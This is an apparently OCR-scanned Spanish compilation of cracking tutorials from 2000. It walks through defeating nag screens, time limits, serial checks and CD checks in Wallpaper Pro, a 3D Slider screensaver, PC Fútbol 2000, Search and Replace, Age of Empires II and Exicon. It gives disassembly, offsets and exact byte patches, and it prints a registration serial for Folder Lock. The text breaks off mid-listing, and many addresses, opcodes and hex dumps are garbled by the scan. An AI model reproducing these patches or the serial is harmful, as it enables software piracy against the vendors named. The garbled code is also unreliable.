e Si probamos a pasar del número límite de veces permitidas, no pasa nada. Nos seguirá 
apareciendo la pantalla, pero nada más. Todo continuará funcionando igual. 

e Recoge las veces que llevamos, es decir el contador en un archivo que crea en el propio 
directorio del programa, con formato de archivo de registro. 


Nosotros vamos a intentar, simplemente, quitar la pantalla inicial. Para ello usaremos el 
Wdasm. Lo desamblamos (con "Open file to disassemble") y si nos damos cuenta en lo que nos 
indica en la pantalla del nag screen, buscamos alguna Cadena que contenga esas odiosas 
palabritas de limitación, por ejemplo "25 times" (con "Find text"): Esto es lo que tenemos: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :004549F6 (U) 


:00454A0A 803D3DC8450000 cmp byte ptr [0045C83D], 00 

:00454A11 7467 Je 00454A7A á La madre del cordero 

:00454A13 6A00 push 00000000 

* Possible StringData Ref from Code Obj ->"This is the shareware evaluation " 
->"version of Wallpaper Pro. You " 


->"have used it " 


:00454A15 BAA8504500 mov edx, 004550A8 


:00454A1A 8D85E4FEFFFF lea eax, dword ptr [ebp+FEFEFFFEES] 


:00454A20 E843ECFAFF call 00403668 


:00454A25 8D95EO0OFEFFFF lea edx, dword ptr [ebp+FEEFFFEEO] 


:00454A2B A140C84500 mov eax, dword ptr [0045C840] 


:00454A30 E85B17FBFF call 00406190 


:00454A35 8B9DEO0FEFFFF mov edx, dword ptr [ebp+FEEFFFEEO] 


:00454A3B 8D85E4FEFFFF lea eax, dword ptr [ebp+FEEFFFEES] 


:00454A41 E80AEDFAFF call 00403750 


:00454A46 8D85E4FEFFFF lea eax, dword ptr [ebp+FEEFFFEES] 


* Possible StringData Ref from Code Obj ->" times so far. You can use it " 


->"25 times before it expires. If " 


=>"you find it useful, register to " 


->"receive the full version with " 


:00454A4C BA00514500 mov edx, 00455100 


:00454A51 E8FAECFAFF call 00403750 


:00454A56 8D85E4FEFFFF lea eax, dword ptr [ebp+FEFFFFEES] 


En :00454A11 7467 je 00454A7A, damos un salto que nos evitará el dichoso mensaje si se 
cumple cierta condición. Pues es fácil, ¿verdad?. invertimos la condición y listos, con un 
JNE, o cambiando el flag de 0. Ahora expliré cómo. 


Para cambiar el JE por JNE, abrimos el Hiew y pulsamos F4. Elegimos modo decode. Ahora, 
presionamos F5 y buscamos 53E11 (este es el offset que corresponde a la dirección de memoria 
y que lo verás en el Wdasm, cuando te colocas en la línea :00454A11 7467 je 00454A7A, en el 
status bar, a la derecha). Intro, y ya estamos en la condición. Ahora F3 para cambiar los 
datos, y cambiamos el 74 del 7467 de nuestra condición, por 75. F9, y F10 para guardar y 
salir. 


Ahora, cuando ejecutes Wallpaper Pro, no saldrá la nag screen. 


Listos. Espero que esté lo suficientemente claro. De no ser así, o si quereis ampliar el 
tutorial, escribidme a: 261019%f(mundomail.net. 


Loco 
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Programa: 3D Slider OpenGL Screensaver v 1.7 


PROTECCION: Serial 


Descripcion: Un Screensaver de la Familia del 3d liquid desktop 


DL 


DOWNLOAD: | http://www. isotope244.com 


Herramientas: W32dasm Editor Hexadecimal 
CRACKER: PrfEsOr X FECHA: 16/07/2000 


INTRODUCCION 


Bueno amigos este será el cuarto tutorial es pero les guste, buscando en internet si 
ya había salido una nueva versión del 3d liquid desktop me tope con este screensaver 
y decidí ver que protección tenia y aquí esta mi resumen de esta protección, bueno 
empecemos con esta torta de Chorizo con guacamole ,,,,»,»!!!!!!! Que se me hace que a 
algunos se les hizo agua la boca.. ¡!!! J ja!ljaja ¡!!!!! 


AL ATAKE 


Lo primero es instalar el programa el cual viene comprimido en un zip y dentro de ese, viene 
solo un readme,txt y el screensaver, ok! Una vez extraído vamos al explorador de window y 
damos clic con el botón derecho sobre el screensaver y aparece una ventana con varias 
opciones seleccionamos la opción d configurar y esta nos manda a la opción de configuración 
del screensaver seleccionamos la opción register e introducimos un nombre, email y numero de 
serie cualquiera y fijémonos en el mensaje que manda ¡! Ok!!!. Bueno continuemos ahora. 
Hagamos una copia del original del screensaver y la copia la abrimos con el w32dasm 8.9 para 


empezar a desensamblar damos clic en el tardara unos 5 segundos en desensamblar ¡! 


Recuerden que el tiempo de desensamblado depende de cada maquina ¡! [| y buscamos el 
string ¡! invalid registration code ¡! Pero que onda pasa aquí ¡!!! No aparece ese string, 
bueno como dice KALIMAN ¡! SERENIDAD Y PACIENCIA MI QUERIDO SOLIN ¡!!! Que hacemos ahora 
bueno echémosle un vistazo al código desensamblado veamos mmmmmmmmm!!!!!! hey hey ya vieron 


| ¡1! Parece que al principio del código hay varios string que les parece si buscamos el que 


nos interesa!!!! ? 


Parece que aquí esta, 


bueno ahora como canijos encontramos la parte de código que manda a 


llamar a este string? Bueno pues muy facil, 


como pueden ver en la siguiente imagen existe un 


texto que nos puede llevar a esta parte del código que es: 


si el DialogID_006D este nos mandara a la parte del código que estamos buscando bueno ahora 


Ñ 
damos clic en : dl e insertamos el DialogID_006D y damos buscar siguiente y nos manda 


directo a la aparte del código que muestra 


1 mensaje d rror: 


* Referenced by a (U)jnconditional or (C)onditional Jump at Addresses: 


1:004040D6(C), :004040E?(C), :004040F8(C), :00404116(C) 
| 

200404134 53 push ebx 

20040413B 681F3C4000 push 00403C1F 

: 00404140 57 push edi 


:00404141 
: 00404143 


5A6D 
FF3540694100 


push 0D00006D 
push dword ptr [00416920] 


Bueno como podemos ver esta parte del código esta referenciada por 4 saltos condicionales 


que son: 


pa 
18] 
cd 

podemos hacer para eso damos clic en 


lo siguiente 


4040d6 4040e7 4040f£8 404116, bueno pues vamos a analizar estos saltos para ver que 


e insertamos el primer salto 4040d6 y nos manda a 


:004040D8 SDSS56O0FFFFFF lea eax, dword ptr [ebp+FFFFFF60] 
:004040DE 50 push eax 

:004040DF ESFC1EOODO call 00405FEO 

:004040E4 S85C0 test eax, eax 

:004040E6 59 pop ecx 

:004040E7? 7451 je 00404134 

:004040E9 SDSS5lIOFFFFFF lea eax, dword ptr [ebp+FFFFFF10] 
:D004040EF 50 push eax 

:004040F0O ESEB1EOOOO call 0O0405FEO 

:004040F5 85C0 test eax, eax 

:004040F7? 59 pop ecx 

:004040F3 7440 je 00404134 

2004040FA SDSS560FFFFFF lea eax, dword ptr [ebp+FFFFFFG6O] 
: 00404100 50 push eax 

:00404101 SD45B0 lea eax, dword ptr [ebp-50] 
:D00404104 50 push eax 

:00404105 SDSS1IOFFFFFF lea eax, dword ptr [ebp+FFFFFF10] 
:0040410B 50 push eax 

:0040410C ESO5060000 call 00404716 

:00404111 83c40c add esp, 0000000Cc 

200404114 S4C0 test al, al 

:00404116 7422 je 00404134 

:00404118 53 push ebx 

:00404119 681F3C4000 push 0D403C1F 

:0040411E 57 push edi 


como pueden ver 


1 primero 


s un salto condicional JE 


0040413A y los otros tres igualmente 


son saltos condicionales que están dirigidos a la misma dirección de memoria la cual nos 
muestra el mensaje de error " registration code invalid" bueno ahora que hacemos pues lo más 
lógico vamos a anular los 4 saltos para que así nunca salte al mensaje de error ok bueno 


para hacer eso simplemente tenemos que cambiar el JE 


por un NOP y para hacer eso vamos al 


w32dasm y nos posicionamos en la línea del primer salto para así obtener su ofíset y 


consecutivamente el de los demás saltos que son: 
40d6 
40e7 
40f£8 
4116 


Cómo ven no puse los ceros ni la h ya que esa no cuenta para nada, bueno una vez obtenidos 
los ofísets, nos vamos al editor hexadecimal , que en este caso yo uso el Hex Work Shop , 
bueno abrimos la copia del screensaver en el hexwork shop y damos CONTROL G e insertamos el 
primer offset y nos manda a localización de este y lo cambiamos por 9090 y así 
consecutivamente con los demás y una vez cambiados guardamos los cambios y cerramos el 
editor hexadecimal y ejecutamos la configuración del screensaver e insertamos nuestro, 


nombre email y numero de serie cualquiera y ¡!!! Listo programa crackeado. ¡!!hufff ¡! Creo 
que ya la hicimos ¡!!!!!. Recuerden que este tutorial solo es para enseñanza, 
SI TE GUSTA EL SCREENSAVER ¡!!!!!! CÓMPRALO ¡111111! 


Cualquier duda, sugerencia, etc. Mandenme un email: 


PD: por cierto este tutorial sirve también para poder crackear el 3d Desktop Destroyer v 1.7 
el cual tiene la misma protección. 
Prefesor_X 
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Programa: FOLDER LOCK V.2.0 


PROTECCION: Nag, Nag en intervalos de tiempo 


Descripcion: Programa para controlar acceso a folders y archivos 
Dificultad: RR 
DOWNLOAD : http://sihs.bizland.com/ 


Herramientas: W32dasm 
CRACKER: Marvin FECHA: 25/07/2000 


| INTRODUCCION 


Este es mi primer tutorial y vamos a investigar un poco el programa Folder Lock 2.0, 
el cual nos permite poner restricciones a el acceso de ciertos archivos o folders, 


por si no quieres que anden viendo lo que no deben dentro de tu computadora. Soy un 
newbie, pero creo que es la protección más fácil de crackear que he visto en toda mi 
vida. 


AL ATAKE 


El programa nos presenta un nag screen nada más empezar, en la que nos pide nombre de 


usuario y numero de registro. 


Pensandola un poco en que herramienta utilizar opte por desensamblarlo primero y tratar de 
buscar el mensaje de error "Invalid License Code" que nos avienta si damos los datos 
equivocados. Para ello utilizaremos el Wdasm. Lo desamblamos (con "Open file to 
disassemble"), pulsamos el botón de StrRef y nos encontramos con que no existe el maldito 
mensaje! 


Al tratar de ver si se veia algo interesando en los resultados arrojados por StrRef me 
encuentro con una entrada que tiene cara de numero de serie (FL12TY-V7861S-OPGH27), será asi 
tan sencillo haber encontrado el numero de serie para este programita? 


No puedo creerlo!, Cuanto te tomo hacer esto? 5 minutos? Este es el numero que te sirve para 


registrar el programita. Espero que este tutorial te haya sido claro, ya que es el primero. 


Pude ver que esta aproximación sirve para los otros programitas que te ofrecen en este lugar 
(Safelock, SecretFolders y Snappeod). 


Y a practicar, practicar, practicar. 


Marvin 
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PC Fútbol 2000 


Programa: 


PROTECCION: CD Check. 


Simulador de FUtbol 


A 


Descripcion: 


DOWNLOAD : 


Herramientas: W32 Dasm 8.93, Hiew 6.5, Hazedor de Cracks v1.4 
CRACKER: Makelolo FECHA: 30/07/2000 


| INTRODUCCION 


Un novato como yo en esto del cracking tenía que empezar por una protección 

sencilla. Este juego, el mejor simulador de Fútbol hecho en España y con una 
solera de casi una década, tiene una mierda de protección para pedir el CD. 

Y eso que en la pantalla de presentación pone: "La piratería es delito." 

No te jode...XD 


| AL ATAKE 


- No soy nadie en esto del cracking así que si alguien no me entiende por mi falta de 
espresión que 

me mande un mail a la dirección de abajo. 

Vemos que cuando ejecutamos el programa, sino está el CD en la unidad nos aparece un mensaje 
que 

dice: "Introduzca el CD-Rom de PC Fútbol 2000". 

Pues como no me apetece abrir el cajón, sacar la caja, abrir la caja, coger el CD, abrir el 
lector, 

meter el CD y cerrar el lector te voy a crackear. 

Lo primero que hemos de hacer es desensamblar el archivo pc£2000.exe. 

Previamente abremos hecho una copia de seguridad de este archivo por lo que pueda pasar. 
Una vez desensamblado con el W32Dasm 8.93 vamos a las String Data References (el icono 
anterior a 

la impresora) y buscamos Cadenas que den mensajes sobre el CD-Rom. 


Encontramos "Introduzca el CD-ROM de 'Ss' " pero para que aparezca este mensaje 
anteriormente ha 

de haber un salto. Un poco antes vemos que aparece "USER32.MessageBoxA" que deducimos será 
el 

mensaje que aparecerá si no encuentra el CD-ROM. 

Un poco después aparece el salto mortal: 

:004013A5 753B jne 004013E2 

Este salto es el que origina la aparición del mensaje. 

Apuntamos la línea, cerramos el desensamblador y abrimos el archivo en un editor 
hexadecimal. 

Cada uno que elija el suyo (cada hombre con su personalidad y Cada cracker con sus 
herramientas), 

pero yo voy a usar HIEW 6.5. 

Busco la línea y cambio el 75 (jne) por un 74 (je). 

Al final la frase quiere decir: Si no está el CD-Rom del PC Fútbol 2000 en la unidad 


entonces 

continúa. Cogemos el Hazedor de Cracks y pillamos como fichero de origen la copia de 
seguridad 

que deberíamos tener hecha y como crackeado el que acabamos de modificar: Ponemos texto y le 
damos 


nombre a nuestro primer crack. 


Despedida: 


Así concluye mi primer crack. Es una protección sencilla de quitar por lo que supongo que no 
tendréis problemas para acabar con ella. 

Saludos para todos los miembros de TNT_Crack_Team y en especial para karpoff 

que hace posible que los crackers latinos tengamos una página de referencia. 

Podéis enviarme sugerencias, correcciones, dudas, etc..., a makeloloflthotmail.com 


Ésto va para Dinamic Multimedia: 


Creo que los programadores de esta empresa deberían de esforzarse un poco 
más en sus protecciones como lo demuestra la mierda de CD-Check. 


Makelolo 2000 
(makelolofthotmail.com) 
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Programa: Search and Replace v 3.3 


PROTECCION: NAg Screen y Time Limit 


Descripcion: | Utileria para buscar y remplazar cadenas de textos 
Dificultad: A 
DOWNLOAD : | http://www. funduc. con 


Herramientas: Win32Dasm, y HEx Work Shop 3.01 
CRACKER: Profesor_X FECHA: 03/08/2000 


| INTRODUCCION 


Mis estimados colegas, este es mi 6to. tutorial y se lo dedico a una muy buena 
herramienta llamada Search and Replace, la cual sirve para buscar y remplasar cadenas 
de textos en diferentes archivos a la vez, la verdad despues de usarlo unos minutos 
me parecio una buena utileria tiene muchas opciones, dignas de usarse, lo que si la 
proteccion es mala, y creo que deberian de ponerle mas enpeño y ponerle una 
proteccion mas buena, ok! ahora analizaremos la protección que trae este 
sharewarecito lo que si vale la pena mencionar es que este analisis de la protección 
es solo para !! AUMENTAR TUS CONOCIMIENTOS !!! SOLO PARA ESO !!! HEEEE!!! ..... 11 "SI 
TE GUSTA EL PROGRAMA !!!! COMPRALO !!! 


AL ATAKE 


| Bueno amigos !!EMPECEMOS EL ANALISIS !!! para iniciar debemos de instalar el programa y lo 
|ejecutamos, el cual nos muestra una Nag Screen al principio del SR asi lo llamaremos desde 
ahora !ok! lo primero que te sale es 


About Search and Replace 


como pueden ver la primera ventana contiene tres botones los cuales si das click en OK ejecuta 

|el programa, bueno despues de un rato de analizar le programa vemos que no tiene ningun 
apartado para insertar un numero de serie lo que quiere decir que es una version demo la cual 
tiene las siguientes protecciones: 


l. NAG SCREEN 
2. LIMITE DE TIEMPO 


|entonces manos a la obra a quitar esas protecciones, que les parece si empezamos con el limite 
de tiempo OK!! lo primero sera adelantar la fecha mas o menos un mes para ver que hace lok, 
|ejecutamos el programa y nos sale la Nag Screen damos click en OK y !! oh!! oh!! nos manda 


como podemos ver nos manda una tipica message box con el texto de siempre mmmm!!! vaya vaya! 

PAN CON LO MISMO !! damos click en ok! y que pasa ya no nos ejecuta el programa mmmm!!! NIÑO 

MALO.. NIÑO MALO!!!, que es lo siguiente por hacer vieron el string " the evaluation period 
| expired if .. bla bla !!, bueno entonces que les parece si desensamblamos el ejecutable 


sr32.exe, pero antes saquemosle una copia, y desensamblamos el original, bueno pues manos a la 
obra, creo que no es necesario explicar como desensamblar el programa ya que creo que ya lo 
saben ok!, una vez 


|desensamblado, nos vamos y damos click en E. boton que muestra las String References y 
buscamos el String que sale en la MessageBox 


4W32Dasm List of String Data Items 


String Resource ID=02161: "Please enter a string.” 
String Resource ID=02162: "HexWiew could not be found. [You can download HexView[Freewar" 


String 


file - extracting' 


The evaluation period expired. féould pou like 


String Resource ID=02163: "Please select a backup directory different than the one you" 
String Resource ID=02164: "Search" 

String Resource ID=02165: "* txt" hip" 

String Resource ID=02166: "Error writing to output file” 
String Resource ID=02167: "You must specify a backup directory when using the Write to * 
String Resource ID=02168: "Processing ZIP files, Id files left [21d2% done)" 
Resource I1D=02169: "Processing ZIP 
5tina Resource ID=021 70 
String Resource ID=02171: "To process the 4 character, it must be doubled(*4). Would y” 
String Resource ID=02172: "Invalid file sizel" 
String Resource ID=02173: " - Unregistered" 
String Resource ID=02174: "Replace -” 
String Resource ID=02175: "Id bytes" 
String Resource ID=02176: "Z.OIFKB" 

String Resource ID=02177: "2. 21f MB" 


to see Orderin' 


20042DDCC 28D4C2464 lea ecx, dword ptr [esp+64] 
:0042DDDO ESSE3ZFDFF call 00401010 

:0042DDD5 28D4C2460 lea ecx, dword ptr [esp+60] 
:0042DDD9 Có68424Dc01000002 mov byte ptr [esp+000001DC], 02 
20042DDE1 ES73BEOZ00 call 00459059 

:0042DDE6 8D4C2438 lea ecx, dword ptr [esp+38] 
:0042DDEA 29502438 mov dword ptr [esp+38], ebx 
:D042DDEE 28950243C mov dword ptr [esp+3C], ebx 
:0042DDF2 ES19270000 call 00430510 

:0042DDF? 85C0 test eax, eax 

:D0042DDF9 742A je 0042DE25 

:0042DDFB 6AFF push FFFFFFFF 


* Possible Reference to Dialog: DialogID_0601, CONTROL_ID-0004, 


:0042DDFD 


* Possible Peference to Stri 


6404 


no Resource ID=0217 


| 
push 00000004 


:0042DE04 ES872E0300 call 00460C90 

:0042DE09 83F806 cmp eax, 00000006 
:0042DE0C 750E jne 0042DE1C 

:D042DEOE SE16 mov edx, dword ptr [esil 
:0042DE10 6201 push 00000001 

:0042DE12 62864000200 push 00020061 

:0042DE17 SBCE mov ecx, esi 

:0042DE19 FF5274 call [edx+74] 


hey y que vemos aqui mm! 
¿sera nuestro salto? 


error, 


un 


0042DDF9 742A JE 0042DE25 " 


lo que tendriamos que hacer 
valor que tenga y así nunca 
apuntamos el offset de la direccion de memoria donde se localiza el salto que es: 


salto condicional JE tres lineas arriba d 
en la linea 


"Láoad... 


ired.DWould you 


nuestro mensaje d 


salto condicional que desactiva el programa pasados 30 dias" 


like 


es Cambiar este salto JE POR UN EB para que salte sin importar el 


termine el periodo de evaluación, 


veamos si funciona, 


para eso 


abrimos con el Hexwork Shop la copia del SR damos Control G y nos manda a 


0002D1C4|8BCE E81C B902 0053 8D4C 2464 EB3B|....... S.Lód.: 
0002D1D2|32FD FF8D 4024 60C6 8424 DCO1 0000|2...LS'..S.... 
0002D1E0|02E8 73BE 0200 8D4C 2438 8950 2438|..s....LS8.558 
0002D1EE |8950 2430 Es19 2700 0085 copBlBBlsa | .ss<..'.... Bj 
0002D1FC|FF6A 0468 7408 0000 ES87 2E03 0083|.j.hz......... 
0002D20A|F806 750E 8B16 6A01 686A 0002 008B|..u...j.hj.... 


0002D1C4|8BCE ES1C B902 0053 8D4C 2464 EBI3B|....... OLA 
0002D1D2|32FD FF8D 4024 6006 8424 DCO1 D0D0|2...LS' ..$.... 
0002D1E0/02E8 Y3BE 0200 8D4C 2438 895€ 2438|..s....L5$8.158 
DOO¿D1EE [6952 243€ E819 2700-0095 COEN 24641. 535%..-* 00... *j 
DOO2D1FC|FF6A 0468 7A08 0000 ES87 2E03 DO083|.j.hz......... 
0002D20A/(F6506 750E 6B16 6401 6564 0002 0O056B|..u...J.hj.... 


grabamos y vamos a ejecutar el programa yyyyyyy!! LISTO LIMITE DE TIEMPO CRACKEADO!!!. OK!! ya 
cambiamos el limite de tiempo ahora si queremos , nos falta quitar esa molesta Nag Screen que 
sale al principio, para eso veamos el codigo y unas tres lines arriba del JE vemos una CALL 


:0042DDD9 Có68424Dco100000Z mov 004 .. traia 02 


:0042DDE6 8D4C2438 lea ecx, dword ptr [esp+38] 
:0042DDEA 89502438 mov dword ptr [esp+38], ebx 
0042DDEE 2895C0243C mov dword ptr [esp+3C], ebx 
:0042DDF2 ES19270000 call 00430510 

:0042DDF7? 85c0 test eax, eax 

:0042DDF9 742A je 0042DE25 

:0042DDFB 6AFF push FFFFFFFF 


0042DDE1 E873BE0200 CALL 00459C59 "llamada encargada de crear la Nag Screen" 


lo que tendremos que hacer para cancelar esa CALL sera facil solo tenemos obtener el offset 
que es: 


E873BE0200 
cambiarla por 
9090909090 


y nos vamos al Hex Work Shop y damos Control G eh insertamos el offset y nos manda a la 
direccion que debemos cambiarla, cambiemosla, grabamos los cambios y ejecutamos el programa 
Y!!!! LISTO !!! CREO QUE ESTE ARROZ YA SE COCIO !!! LISTO PROGRAMA CRACKEADO COMPLETAMENTE! 


NOTA: ESTE TUTORIAL ES SOLO PARA AUMENTAR TUS CONOCIMIENTOS !! SI TE GUSTA EL PROGRAMA 
COMPRALO !!! 


NOTA 2: SI QUIERES BAJAR LA COMPILACION DE TUTORIALES, LA CUAL CONTIENE MAS DE 250 TUTORIALES 
LA PUEDES BAJAR DE AQUI . O SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA NUEVA VERSION 
MANDAMELOS A MI EMAIL Y YO ME COMUNICARE CONTIGO !!SALUDOS!! 


Profesor_X 


sobre 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: Age of Ampires II 


PROTECCION: CD CHECK 


Descripcion: Excelente Juego de Estrategia en Tiempo Real. 
Dificultad: PRINCIPIANTE 
DOWNLOAD : 22222??? 


Herramientas: HEXWORKSHOP V3.01 / WI32DASM V38.9 
CRACKER: DeK Oin FECHA: 08/08/2000 


| INTRODUCCION 


Hola amigos que tal?. 


En este tutorial se explica cómo crackear el Age of Empires II. Sepan disculpar si 
algo no queda bien explicado, es que este es mi primer tutorial, si no entienden 


algo, háganmelo saber adek oinChotmail.com 


AL ATAKE 


Primero que nada ejecuten empires2.exe sin el CD en la unidad u héchenle un vistazo a lo que 
dice "para jugar una partida de un jugador debes insertar un CD del juego y reiniciar Age of 
Empires II, al diablo!!! Primero deben tener su copia de seguridad de empires2.exe. Si la 
tienen abran empires2.exe (no la copia) con el Wdasm. 


Hagan clic en imported functions y busquen la función utilizada por el 99% de los juegos, 
GetDriveTypeA. Hagan doble clic en ella y verán esto: 


Vayan subiendo hasta encontrar: 


Lo que haremos será cambiar 7424 a 7524 en el editor hexadecimal. Si se dan cuenta, en la 
parte inferior de la ventana del WDasm hay una cosa así: 


Agell3.png (14319 bytes) 


ven donde dice Offset, eso es lo que introduciremos en el Hex Workshop recuerda que no debes 
introducir los ceros, son para que entienda el WDasm, ni la h ya que significa que está en 
haxadecimal ) así que abran el Hex Workshop, hagan clic en edit/go to y escriban el 

offset (1F176). 


Luego cambien el 74 por el 75, salta si es equivalente a salta si no es equivalente. 
Guarden los cambios y pruébel el Age of Empires II 
¿FUNCIONA? (a mi me funcionó así que pienso que debería funcionar) 


Felicidades!!!! CRACKEASTE EL AGE OF EMPIRES II 


Nota: este tutorial está creado solo con fines educacionales. El autor no se responsabiliza de el uso que le puedan 
dar. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: CRACKEANDO EL EXICON 


PROTECCION: Time Trial. Hay que introducir un número de serie 


Descripcion: Extrae Iconos de los Programas 


Dificultad: Principiante+ 
DOWNLOAD : A 


Herramientas: W32DASM, y EXESCOPE 


CRACKER: Stomper FECHA: 25/08/2000 


| INTRODUCCION 


Este programa lo intente crackear por recomendacion de alguien del canal tcrackers 
del hispano. Como programa 

no le encuentro ningun uso, pero bueno, se intentara. 

Lo podeis encontrar aqui: Www.basta.com 


Bueno no me enrollare mas e ire al grano; 


AL ATAKE 


Descargo el programa, lo instalo, para observarlo, lo primero que me aparece es una Cadena 
parecida a esta: 
"The aplication cannot start because the system clock is not correct" 


Aclaracion: Tengo la pila de la bios gastada y estoy a fecha de 1 de enero del 97. Este 
mensaje 

no tendria por que saliros a no ser que tengais el mismo problema que yo o hayais cambiado 
la fecha. 

Pero bueno, asi me ahorro tener que andar cambiando fechas para ver que pasa. 

Al final va a resultar que este cambio nos lo podiamos haber ahorrado atacando directamente 
a la comprobacion 

del numero de serie pero asi practicamos mas, que es lo que nos interesa. 


Volviendo al tema, apuntamos la cadena, ahora desensamblamos el ejecutable y guardamos el 
proyecto. 

El W32Dasm no nos da ningun error, eso es una buena señal ;). 

Hacemos doble click sobre la cadena y aparecemos en: 


:00409DF9 E8020A0000 call 0040A800 
:00409DFE 85C0 test eax, eax 
:00409E00 741E Je 00409E20 
:00409E02 GAFF push FFFFEFFFE 
:00409E04 6A10 push 00000010 


* Possible Reference to String Resource ID=25220: "The application cannot start because the 
system clock is not" 

:00409E06 6884620000 push 00006284 

:00409E0B E871990100 call 00423781 


Este codigo esta claro, en el primer call se comprueba la fecha del reloj y sino es correcta 
nos aparece la ventana. 

Asi que nos situamos sobre el salto y apuntamos el offset 9200 

y ponemos un par de NOPS. 


Hacemos una copia del ejecutable y la parchemos y la ventana no aparece. Primer objetivo 
cumplido. 


TIMANDO AL PROGRAMA :) 

Ahora le damos a yes y estamos en la ventana en la que introducir el numero de serie. 
Metemos un numero cualquiera y 

obtenemos el siguiente mensaje. En mi caso pruebo con 11111111 en el primer cuadro y 
12345678 en el segundo. En total 16 

Caracteres. Y va el notas del programa y me salta con un "The password you have entered is 
not correct." 

Volvemos a W32Dasm y buscamos la cadena, aparecemos aqui: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040ABBF (C) 

:0040ABE3 6AFF push FEFFFEFFFE 

:0040ABE5 6A30 push 00000030 


* Possible Reference to String Resource ID=25224: "The password you have entered is 
incorrect." 

:0040ABE7 6888620000 push 00006288 <=== Aqui aparecemos 

:0040ABEC E8908B0100 call 00423781 


Venimos de un salto condicional, ummm, sospechoso ¿no? ;). Ahora vamos a la direccion 
40ABBF. 
Y tenemos esto: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040AB29 (C) 

:0040AB7F 51 push ecx 

:0040AB80 E80B2F0000 call 0040DA90 

:0040AB85 83C404 add esp, 00000004 

:0040AB88 8BF8 mov edi, eax 

:0040AB8A E8EBC30100 call 00426F7A 

:0040AB8F 8B4010 mov eax, dword ptr [eax+10] 
:0040AB92 6A00 push 00000000 

:0040AB94 50 push eax 

:0040AB95 E8D6100000 call 0040BC70 

:0040AB9A 8BCF mov ecx, edi 

:0040AB9C 83C408 add esp, 00000008 

:0040AB9F 2BC8 sub ecx, eax 

:0040ABA1 81F94D060000 cmp ecx, 0000064D 
:0040ABA7 7418 je 0040ABC1 

:0040ABA9 81F943060000 cmp ecx, 00000643 
:0040ABAF 7410 je 0040ABC1 

:0040ABB1 81F95F060000 cmp ecx, 0000065F 
:0040ABB7 7408 je 0040ABC1 


:004 
:004 


OABB9 
OABBF 


81F9F0050000 cmp ecx, 000005F0 
7522 jne 0040ABE3 <====== Aqui aparecemos 


Vamos a ver que tenemos en la direccion que nos referencia de nuevo. 


:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 


:004 


OAAF7 
OAAFC 
OAAFF 
0ABO5 
0ABOC 
OABOF 
0AB11 
0AB17 
0AB18 
OAB1D 
0AB24 
0AB27 
0AB29 
0AB2B 


E8CA210100 call 0041CCC6 

83F801 cmp eax, 00000001 

0F85EC000000 jne 0040ABF1 

8B8424BC000000 mov eax, dword ptr [esp+000000BC] 
8B48F8 mov ecx, dword ptr [eax-08] 

85C9 test ecx, ecx 

0F84DA000000 je 0040ABF1 

50 push eax 

E833100000 call 0040BB50 <= Aqui se comprueba si el numero de serie es correcto 
8B8C24C0000000 mov ecx, dword ptr [esp+000000C0] 
83C404 add esp, 00000004 

85C0 test eax, eax 

7454 Je 0040AB7F <======= Desde Aqui se nos llama 
8B51F8 mov edx, dword ptr [ecx-08] 


Tenemos un call, seguido de un mov y un add, y luego una comparacion y un salto. 
Vamos a ver un poco por encima lo que hace 


:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 


:004 


OBB50 
OBB51 
OBB52 
OBB56 
OBB57 
OBB59 
OBB5F 
OBB61 
OBB64 
OBB66 
OBB67 
OBB68 
OBB6A 
OBB6B 
OBB6E 
OBB74 


53 push ebx 

56 push esi 

8B74240C mov esi, dword ptr [esp+0C] 

57 push edi <= Nuestro numero de serie todo junto (1111111112345678) 

85F6 test esi, esi 

0F84F2000000 je 0040BC51 <= Salto a 40BC51 ummmm... 

8BFE mov edi, esi <= Copiamos el serial a edi 

83C9FF or ecx, FEFFFFEF 

33C0 xor eax, eax <= Ponemos eax (ntr. numero) a cero 

F2 repnz 

AE scasb 

F7D1 not ecx 

49 dec ecx 

83F910 cmp ecx, 00000010 <= Comparamos la longitud con nuestro codigo con 10h, 16 
0F85DD000000 jne 0040BC51 <= Si es menor de 16 salta al salto de antes... 
B90F000000 mov ecx, 0000000F <= ECX vale 15, y este va ser el valor de el contador 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040BB91 (C) 


| 

:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 


:004 


OBB79 
OBB7C 
OBB7E 
OBB84 
OBB86 
OBB8C 
OBB8E 
OBB8F 
OBB91 
OBB93 
OBB97 
OBB9A 
OBB9D 
OBBAO 
OBBA2 


8A0431 mov al, byte ptr [ecx+esi] <= 1. Copiamos el ultimo caracter de nto n* a al 
3C30 cmp al, 30 <= 2. Lo comparamos con 0 

0F8CCDO000000 31 0040BC51 <= 3. Si es menor de 0 otra vez a la misma direccion.... 
3C39 cmp al, 39 <= 4. Ahora lo comparamos con 9 

0F8FC5000000 3Jg 0040BC51 <= 5. Si es mayor que 9 al mismo sitio vamos..... 

8BC1 mov eax, ecx <= 6. Copiamos el valor del contador a eax 

49 dec ecx <= 7. Restamos uno al contador 

85C0 test eax, eax <= 8. Si eax es igual a 0 seguiremos con el codigo 

75E6 jne 0040BB79 <= ESTA COMPROBACION SE REALIZA CON TODOS LOS CARACTERES 
OFBES5E0F movsx ebx, byte ptr [esi+0F] <= Copiamos el ultimo numero a EBX 

83EB30 sub ebx, 00000030 <= Le restamos 30h: en ascii, 56 -— 48 = 8 

8D4301 lea eax, dword ptr [ebx+01] <= Copiamos a eax, 8 + 1 = 9 

83F80F cmp eax, 0000000F <= Lo comparamos con 15 

7C03 31 0040BBA5 <= Saltamos si es menor 

83E80F sub eax, 0000000F 


Me voy a centrar en como crackear la rutina de comprobacion, no en que consiste esta porque 
no me apetece mucho. Asi que seguimos observando el codigo: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040BBAO (C) 


:0040BBA5 40 inc eax 
